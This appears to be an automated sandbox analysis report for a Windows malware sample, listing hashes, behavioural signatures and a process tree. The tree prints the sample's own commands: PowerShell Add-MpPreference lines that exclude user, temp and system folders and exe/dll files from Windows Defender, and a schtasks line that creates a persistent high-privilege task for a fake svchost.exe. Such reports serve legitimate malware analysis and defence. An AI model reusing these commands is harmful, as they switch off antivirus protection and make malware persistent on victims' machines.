Analysis
-
max time kernel
148s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-01-2025 20:07
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_d12f20d20f23819ef3448bc10873ba57.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$TEMP/Selfconvened.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$TEMP/Selfconvened.exe
Resource
win10v2004-20241007-en
General
-
Target
$TEMP/Selfconvened.exe
-
Size
4.5MB
-
MD5
64b5e984fda860eedf19c29a124094fb
-
SHA1
760c195741989e17b48ad52c13bed35e8ea51692
-
SHA256
1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39
-
SHA512
187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4
-
SSDEEP
98304:xLIWL25lsofrCgl5PmHGjCYv8LHPrVWPa5Qwy:Fslsofuit0bJWPa5QJ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2136 powershell.exe 1388 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2176 svchost.exe 1928 svchost.exe -
Loads dropped DLL 1 IoCs
pid Process 2464 taskeng.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe File opened for modification C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2184 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1640 Selfconvened.exe 2136 powershell.exe 1388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1640 Selfconvened.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 2176 svchost.exe Token: SeDebugPrivilege 1928 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1640 wrote to memory of 2684 1640 Selfconvened.exe 32 PID 1640 wrote to memory of 2684 1640 Selfconvened.exe 32 PID 1640 wrote to memory of 2684 1640 Selfconvened.exe 32 PID 1640 wrote to memory of 2184 1640 Selfconvened.exe 34 PID 1640 wrote to memory of 2184 1640 Selfconvened.exe 34 PID 1640 wrote to memory of 2184 1640 Selfconvened.exe 34 PID 2684 wrote to memory of 2136 2684 cmd.exe 35 PID 2684 wrote to memory of 2136 2684 cmd.exe 35 PID 2684 wrote to memory of 2136 2684 cmd.exe 35 PID 2684 wrote to memory of 1388 2684 cmd.exe 37 PID 2684 wrote to memory of 1388 2684 cmd.exe 37 PID 2684 wrote to memory of 1388 2684 cmd.exe 37 PID 2464 wrote to memory of 2176 2464 taskeng.exe 39 PID 2464 wrote to memory of 2176 2464 taskeng.exe 39 PID 2464 wrote to memory of 2176 2464 taskeng.exe 39 PID 2464 wrote to memory of 1928 2464 taskeng.exe 40 PID 2464 wrote to memory of 1928 2464 taskeng.exe 40 PID 2464 wrote to memory of 1928 2464 taskeng.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\cmd.exe"cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2184
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B53CE9A1-A763-4E49-804E-7280C2002443} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD537627b46d7b7011ae982e756f467012c
SHA1b6fa4500e59483379b59119d04d558d7443c29d6
SHA256d6f3e123fa17755231878803a9c20309dfaf6ddab3886b56317614af3f1cff9f
SHA51201401a7aeda2b4dd6c449e9520a31dc3b7151f8494adf5dd57642ec5810afd612fc840d358610537f98c8e344431e95a3403d677a12ba80e4e60b944c5c640be
-
Filesize
10.6MB
MD5b0504bad3a175be5267a7ee70e5e1262
SHA1cbb00488bcdb43d526a416a56df12de5bd891218
SHA256030742e8d20a89db614908d35d75a3a40f313d207ae58dbc97d280c8013d0294
SHA5122b6b0713a04e5cac1c52c56a763a196797b0cd48f07834dd72d48b96467a5df199e878505f9793fa1aa58e946a02054409754b59db677bd9002d8bc0fb73bd68